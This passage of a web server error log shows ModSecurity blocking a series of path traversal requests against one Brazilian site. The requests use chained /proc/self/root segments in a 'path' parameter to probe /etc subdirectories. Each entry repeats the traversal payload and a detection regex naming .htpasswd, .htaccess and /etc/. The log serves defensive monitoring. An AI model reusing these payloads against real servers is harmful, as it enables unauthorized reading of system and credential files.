"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraZkzinOy1jxa1j4c6KQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:29.025357 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:58664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraaeoXxyEfFpUF8f-RnQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:30.371418 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:58678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraauoXxyEfFpUF8f-RnwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:31.092394 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:33230] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:01:31.670895 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:58684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraa-oXxyEfFpUF8f-RogAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:32.947203 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:58686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrabAbLMZ6AikZjR9XhFwAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:35.226975 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:58690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrabvu8EFLIOrSqIpsjpwAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:36.558328 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:58692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abracAbLMZ6AikZjR9XhHgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:37.911254 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:54940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abracSmAPhZkrhU8w4mOxQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:39.252572 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:54952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abracwbLMZ6AikZjR9XhKwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:40.511721 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:54962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abradCmAPhZkrhU8w4mOyQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:41.811345 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:54966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abradcdf6f5d65gmYZT2cAAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:43.131012 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:54980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrad-oXxyEfFpUF8f-RowAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:45.451817 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:54996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraeAbLMZ6AikZjR9XhNwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:46.994261 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:55010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraeuw_le52K8_3pV3-2gAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:48.356152 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:57830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrafAbLMZ6AikZjR9XhOAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:49.620401 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:57832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrafeoXxyEfFpUF8f-RpQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:50.969182 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:57840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrafuyqAr6etmhZHNrpFAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:52.704357 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:57846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abragAbLMZ6AikZjR9XhQAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:54.053809 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:57856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraguoXxyEfFpUF8f-RrgAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:55.306688 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:57860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrag-w_le52K8_3pV3-3AAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:56.620131 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:57866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrahPu8EFLIOrSqIpsjtAAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:57.935764 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:37828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrahQkwaGbbGflqUZAylQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
